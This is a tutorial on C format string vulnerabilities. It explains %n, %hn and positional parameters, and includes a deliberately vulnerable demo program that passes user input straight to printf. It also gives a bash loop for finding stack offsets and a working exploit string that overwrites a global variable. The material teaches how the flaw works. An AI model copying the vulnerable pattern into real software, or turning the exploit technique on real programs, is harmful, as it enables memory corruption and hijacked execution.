Format String Vulnerabilities
Introduction
A format string vulnerability is a vulnerability in which a malicious user, Vladimir, will be able to redirect code execution or alter data in one way or another by misusing a (small) mistake by an unknowing programmer.
These vulnerabilities lie within a series of C runtime functions which process data based on a format string, the most common functions being printf()[1] and scanf()[2].
Format String 101
A format string describes the data the programmer wants to read from or write to a stream (stdin[3], stdout[3], stderr[3], files, sockets, logs, …). Format strings are very powerful, and when they are used in the wrong way they can overwrite data they were never meant to touch, resulting in an “undocumented feature”[4] (“It’s not a bug! It’s an undocumented feature!”).
I will start with format string vulnerabilities related to printf()[1]. printf() is declared as:
int printf(const char *fmt, ...);
The first argument is a format string that describes the data that follows (if any). The “…” in the declaration of printf() means that any number of parameters can be passed to printf(); the format string defines which of them are used. First we will learn more about the format string and how it is represented (at least the parts that matter to us), then we will see a few examples.
printf() does nothing special with the format string until it finds a % token. This is the “special” token that indicates that data from the stack (one of the parameters given to the function) may be used.
When this token is followed by another %, nothing interesting happens and a single % is written to the stream. There are a few common “conversion specifiers”, e.g. c for a single 8-bit character, s for a zero-terminated string, d for a signed decimal integer (32 bits on the platforms discussed here), etc.
// Writes: "Hello %"
printf("Hello %%");
// Writes: "Hello world!"
printf("Hello world!");
// Writes: "Number: 1337"
printf("Number: %d", 1337);
// Writes: "Format Strings"
printf("%s %s", "Format", "Strings");
Now for some more interesting things. By using a so-called “field width” we can specify the minimum number of bytes to write to the stream, no matter how short the actual representation of the converted value is. The field width is given as an integer after the % token and before the conversion specifier. When the field width exceeds the length of the converted value, the value is (by default) padded with spaces on the left. Some examples:
// Writes: "           A" (11 spaces, then 'A': 12 bytes in total)
printf("%12c", 'A');
// Writes: "          Hello!" (10 spaces, then "Hello!": 16 bytes in total)
printf("%16s", "Hello!");
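The padding is easier to check when the output goes into a buffer instead of a terminal. The following is a minimal sketch, not part of the original text: pad_char is a hypothetical helper, and it uses the standard `*` width (which takes the field width from an int argument) so the width can be varied.

```c
#include <stdio.h>

/* Hypothetical helper: renders `ch` right-aligned in a field that is
 * `width` bytes wide. Returns the number of bytes snprintf() produced
 * (not counting the terminating '\0'). */
int pad_char(char *buf, size_t size, int width, char ch)
{
    /* "%*c" is the same as "%12c" when width == 12 */
    return snprintf(buf, size, "%*c", width, ch);
}
```

Called with a width of 12, the return value is 12: the field width, not the length of the converted value, decides how many bytes are produced.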
In other words, we control how many bytes a format string writes, which is very important, as we will see now. There is a special conversion specifier that does not print an argument but stores a result through it: the n conversion specifier. It takes the number of bytes written so far and stores it as an int (32 bits on the platforms discussed here) at the address given by the corresponding argument. Let’s see some more examples.
int n;
// n will contain 12 after this call
printf("%12c%n", 'A', &n);
// n will contain 16 after this call
printf("%16s%n", "Hello!", &n);
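The same behaviour can be observed without printing anything. This is a small sketch under assumptions: bytes_before_n is a hypothetical helper, and it assumes a C library that honours %n for constant format strings (some hardened libraries restrict it).

```c
#include <stdio.h>

/* Hypothetical helper: reports what %n stores after `word` has been
 * formatted in a field of at least `width` bytes. */
int bytes_before_n(const char *word, int width)
{
    int n = -1;

    /* With a NULL buffer of size 0 nothing is stored as output, but the
     * format string is still processed, so %n still records the count. */
    snprintf(NULL, 0, "%*s%n", width, word, &n);
    return n;
}
```

With "Hello!" and a width of 16 the helper returns 16. With a width of 3 it returns 6, because the field width is only a minimum.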
There are also two variations on this conversion specifier, selected with a so-called “length modifier”. The length modifier h turns the 32-bit write into a 16-bit write, so if we want to overwrite a short int (a 16-bit integer) but must not modify the bytes behind it, we use %hn. The length modifier hh (as in %hhn) goes one step further and writes only 8 bits, so to overwrite a single byte somewhere in memory (for example, a character in a string), %hhn is the way to go.
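To see what the length modifiers do to a count that does not fit, consider the sketch below. The helper names are hypothetical, and the results assume the usual behaviour on mainstream platforms (16-bit short, 8-bit char, and a count that is simply truncated to the low bits when stored).

```c
#include <stdio.h>

/* Hypothetical helper: stores the byte count through %hn (16-bit write). */
short count_as_short(int width)
{
    short out = 0;

    snprintf(NULL, 0, "%*c%hn", width, 'A', &out);
    return out;
}

/* Hypothetical helper: stores the byte count through %hhn (8-bit write). */
signed char count_as_char(int width)
{
    signed char out = 0;

    snprintf(NULL, 0, "%*c%hhn", width, 'A', &out);
    return out;
}
```

Under those assumptions a width of 70000 (0x11170) stored with %hn leaves 0x1170 (4464) in the short, and a width of 300 (0x12c) stored with %hhn leaves 0x2c (44) in the char. This truncation is what makes it possible to build a large value out of small writes.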
Before we continue with examples, there is one more attribute of the conversion specifier that gives us even more control: the “parameter index” modifier (a POSIX extension, not part of ISO C). The parameter index allows us to specify which parameter we want to retrieve data from or (in the case of the %n conversion specifier) write data to. The parameter index is set by inserting m$ directly after the % token, m being the index (starting at 1) of our parameter. Some examples:
// Note that the parameter indices are swapped!
// Writes: "Strings Format"
printf("%2$s %1$s", "Format", "Strings");
// First writes 41 spaces, followed by the lowest 8 bits of
// the address of n as character, then writes the value 42 to n.
// Also note that we reuse the "&n" parameter.
// (POSIX leaves mixing indexed and non-indexed specifiers undefined;
// this relies on the C library tolerating it.)
int n;
printf("%42c%1$n", &n);
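A buffer-based variant of the first call makes the reordering easy to verify. This is a minimal sketch assuming a POSIX C library that supports the m$ syntax; swap_words is a hypothetical helper name.

```c
#include <stdio.h>

/* Hypothetical helper: prints its two string arguments in swapped
 * order by selecting them with parameter indices. */
int swap_words(char *buf, size_t size, const char *first, const char *second)
{
    /* %2$s selects `second`, %1$s selects `first` */
    return snprintf(buf, size, "%2$s %1$s", first, second);
}
```

Calling swap_words(buf, sizeof buf, "Format", "Strings") leaves "Strings Format" in buf.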
Calculating Offsets
We have now seen the power of printf(). However, we are still missing one thing that is specific to the scenario you are exploiting: the address to overwrite. We covered how to write n bytes and store that count at the address given by the parameter with index m. A small drawback is that a printf() implementation may allocate a buffer as large as the field width you request, and actually writing that many bytes to a file (or, even worse, a socket) can become a bottleneck. But we can come up with a solution to this, of course.
For this example we will assume that we control two parameters, address and address+2 (in other words, the address we want to overwrite is on the stack, as well as this address + 2, 2 being the size of a short int). We calculate how many bytes we have to write to reach the lower 16 bits of the value n we want to write, write that many bytes, and follow them with a 16-bit write (%hn). What’s left is to calculate the number of bytes to write for the higher 16 bits, again followed by a 16-bit write.
Writing the higher 16 bits is a bit more tricky, since we have already written x bytes (x being the value of the lower 16 bits). We calculate the number of bytes to write for the higher 16 bits like this:
// lower 16 bits of the value "n"
int lower_16bit = ???;
// higher 16 bits of the value "n"
int higher_16bit = ???;
// we want to write higher_16bit bytes
// we have already written lower_16bit bytes
// solution: subtract lower_16bit from higher_16bit
// make sure to keep a positive integer (by adding 0x10000
// which is one more than the biggest 16bit integer)
// followed by an and statement, we don't want to write
// 0x10000 bytes for nothing (which is possible otherwise)
// ie: if higher_16bit equals lower_16bit then we don't
// have to write any bytes at all, but the +0x10000 would
// make us write 0x10000 bytes, so we cut them off again.
int amount = (higher_16bit - lower_16bit + 0x10000) & 0xffff;
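The calculation above can be wrapped in small functions so it can be tried with concrete values. The names low16, high16 and padding_between are hypothetical and only serve this sketch.

```c
#include <stdint.h>

/* Lower 16 bits of the 32-bit value we want to write. */
unsigned low16(uint32_t value)
{
    return value & 0xffffu;
}

/* Higher 16 bits of the 32-bit value we want to write. */
unsigned high16(uint32_t value)
{
    return (value >> 16) & 0xffffu;
}

/* Number of extra bytes to print so that the low 16 bits of the running
 * byte count move from `already` to `wanted`. Adding 0x10000 keeps the
 * intermediate result positive, the mask removes it again when it was
 * not needed. */
unsigned padding_between(unsigned already, unsigned wanted)
{
    return (wanted - already + 0x10000u) & 0xffffu;
}
```

For the value 0xdeadf00d this gives padding_between(low16(v), high16(v)) == 61088, and for a value whose halves are equal, such as 0x12341234, it gives 0.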
So basically, if address and address+2 are on the stack, we can write any value to any address, yay! Let’s see an example of how we would come up with such a format string.
// We assume that the value "address" is the 5th parameter
// And that the value "address+2" is the 6th parameter
// We want to write the value n=0xdeadf00d to "address"
// Lower 16bits of n = 0xf00d = 61453
// Higher 16bits of n = 0xdead = 57005
int amount_lower = 61453;
int amount_higher = (57005 - 61453 + 0x10000) & 0xffff;
// amount_higher = 61088
// resulting in the following format string:
// (note the parameter indices for both addresses,
// and the 16bit writes using %hn)
const char *fmt = "%61453c%5$hn%61088c%6$hn";
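Building such a string by hand is error-prone, so here is a hedged sketch of a generator. It follows the 16-bit (%hn) approach described in the text; build_two_write_format and append_write are hypothetical names. One detail the sketch has to handle: a field width of 0 still prints one byte for %c, so a padding of 0 must omit the %c entirely.

```c
#include <stdint.h>
#include <stdio.h>

/* Appends "pad bytes, then a 16-bit write through parameter `index`"
 * to buf at offset pos. Returns the new offset, or -1 on error. */
static int append_write(char *buf, size_t size, int pos, unsigned pad, int index)
{
    int n;

    if (pos < 0 || (size_t)pos >= size)
        return -1;
    if (pad > 0)
        n = snprintf(buf + pos, size - pos, "%%%uc%%%d$hn", pad, index);
    else /* "%0c" would still emit one byte, so skip the padding */
        n = snprintf(buf + pos, size - pos, "%%%d$hn", index);
    if (n < 0 || (size_t)n >= size - pos)
        return -1;
    return pos + n;
}

/* Builds a format string that writes `value` in two 16-bit steps:
 * the low half through parameter index_low, the high half through
 * parameter index_high. Returns the string length, or -1 on error. */
int build_two_write_format(char *buf, size_t size, uint32_t value,
                           int index_low, int index_high)
{
    unsigned low = value & 0xffffu;
    unsigned high = (value >> 16) & 0xffffu;
    int pos = append_write(buf, size, 0, low, index_low);

    return append_write(buf, size, pos,
                        (high - low + 0x10000u) & 0xffffu, index_high);
}
```

For the value 0xdeadf00d with parameter indices 5 and 6, this produces "%61453c%5$hn%61088c%6$hn".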
Hardcoding Addresses
We have just seen a working format string, but we are still missing one thing: the addresses. It is unlikely that they will be in the parameter list just like that, so we have to put them there ourselves. Getting an address into the parameter list can be a little tricky. However, if the format string itself is located on the stack, it shouldn’t be hard to find. Let’s find out using an example:
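// fmtstr1.c corresponds with the binary ./fmtstr1
#include <stdio.h>
#include <string.h>

static volatile int magic_value = 0;

void process(const char *str)
{
    // the bug: user-controlled data is used as the format string
    printf(str);
}

int main(int argc, char *argv[])
{
    char str[128];

    if (argc < 2) {
        return 1;
    }
    // strncpy() does not terminate the copy when the source is too long
    strncpy(str, argv[1], sizeof(str) - 1);
    str[sizeof(str) - 1] = '\0';
    process(str);
    if (magic_value == 0xdeadf00d) {
        printf("nice job!\n");
    }
    return 0;
}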
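For contrast, the usual way to avoid the mistake in process() is to pass the untrusted text as an argument to a constant format string, so that its % tokens are never interpreted. The sketch below is not from the original text; render_untrusted is a hypothetical name, and it writes to a buffer only so the result can be inspected.

```c
#include <stdio.h>

/* Hypothetical helper: copies user-supplied text into buf verbatim.
 * The format string is the constant "%s", so any % tokens inside
 * user_text are treated as plain data. */
int render_untrusted(char *buf, size_t size, const char *user_text)
{
    return snprintf(buf, size, "%s", user_text);
}
```

With this pattern an input such as "%x %n %s" comes out unchanged, and no parameter is read or written on its behalf.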
This is a very simple example of a format string vulnerability: printf() accepts a string that we control completely. Using a relatively simple bash expression on the command line we can quickly figure out which parameter indices contain our address and address+2, which we will be hardcoding in the format string itself. For this example we will assume that the global variable “magic_value” remains at address 0x08049644, and we will obviously want to write the value 0xdeadf00d to it in order to get our beloved printf("nice job!\n"). So let’s find out what the parameter indices are.
# we look for values 0x44332211 and 0x88776611 on the stack
# we will print the parameter index and corresponding value
# for each index in the range 1 to 256. values found using
# this method might differ based on compiler options, etc.
# set the addresses to an environment variable
# (addresses are little-endian)
$ export ADDRS=$'\x11\x22\x33\x44\x11\x66\x77\x88'
# this for loop will iterate 256 times, execution trace will be:
# ./fmtstr1 $'\x11\x22\x33\x44\x11\x66\x77\x88 1 %1$p\n'
# ./fmtstr1 $'\x11\x22\x33\x44\x11\x66\x77\x88 2 %2$p\n'
# ./fmtstr1 $'\x11\x22\x33\x44\x11\x66\x77\x88 3 %3$p\n'
# ... snip ...
$ for i in `seq 1 256`; do ./fmtstr1 "$ADDRS"' '$i' %'$i$'$p\n'; done
... snip ...
.. garbage .. 11 0xbfffdd24
.. garbage .. 12 0x44332211
.. garbage .. 13 0x88776611
.. garbage .. 14 0x08048100
... snip ...
# actually the values were also found further in the stack because they
# are also stored in argv[] but we are better off ignoring those
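The addresses are stored in little-endian[5] byte order, which is why the bytes \x11\x22\x33\x44 show up as the value 0x44332211. You can see that parameter index 12 contains our first address (0x44332211) and parameter index 13 our second address (0x88776611). This is very good news, because now we can finish our exploit!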
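The byte order used when hardcoding an address can be reproduced with a few shifts. This is a small sketch; pack_le32 is a hypothetical helper name.

```c
#include <stdint.h>

/* Hypothetical helper: stores a 32-bit address in little-endian order,
 * i.e. least significant byte first, as it must appear in the payload. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xffu);
    out[1] = (unsigned char)((addr >> 8) & 0xffu);
    out[2] = (unsigned char)((addr >> 16) & 0xffu);
    out[3] = (unsigned char)((addr >> 24) & 0xffu);
}
```

For the address 0x08049644 this yields the bytes 0x44 0x96 0x04 0x08, and for 0x44332211 it yields 0x11 0x22 0x33 0x44.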
# set the address of the lower 16 bits of magic_value
$ ADDR1=$'\x44\x96\x04\x08'
# set the address of the higher 16 bits of magic_value
$ ADDR2=$'\x46\x96\x04\x08'
# we will prepend our format string with $ADDR1 and $ADDR2
# this will write 8 bytes to our stream, so we have to take
# this into account when writing the amount_lower bytes
# (note: we take amount_lower and amount_higher which we
# calculated earlier), so basically we have to subtract
# 8 from amount_lower. Time for some exploitation!
# btw, amount_lower = 61453 - 8 = 61445, amount_higher = 61088
$ ./fmtstr1 "$ADDR1$ADDR2"'%61445c%12$hn%61088c%13$hn'
nice job!
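The arithmetic behind the final format string can be checked safely by letting the two 16-bit writes land in local variables instead of a foreign address. This is a sketch under assumptions: simulate_two_writes is a hypothetical name, the literal "AAAABBBB" merely stands in for the 8 address bytes, all specifiers use parameter indices so the call stays within POSIX rules, and a C library that supports m$ and %hn is assumed.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical check: replays the byte counts of the final format
 * string and returns the 32-bit value the two %hn writes add up to. */
uint32_t simulate_two_writes(void)
{
    short low = 0;
    short high = 0;

    /* 8 prefix bytes + 61445 = 61453 (0xf00d) before the first write,
     * plus 61088 = 122541 (0x1dead) before the second write, which
     * %hn truncates to 0xdead. */
    snprintf(NULL, 0, "AAAABBBB%1$61445c%2$hn%1$61088c%3$hn",
             'x', &low, &high);

    return ((uint32_t)(uint16_t)high << 16) | (uint16_t)low;
}
```

Under those assumptions the function returns 0xdeadf00d, the value the exploit stores in magic_value.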
Nice! We have just overwritten the magic_value with the value 0xdeadf00d.
References
- [1] printf(3) - Linux man page
- [2] scanf(3) - Linux man page
- [3] Standard Streams - Wikipedia
- [4] Undocumented Feature - Wikipedia
- [5] Little Endian - Wikipedia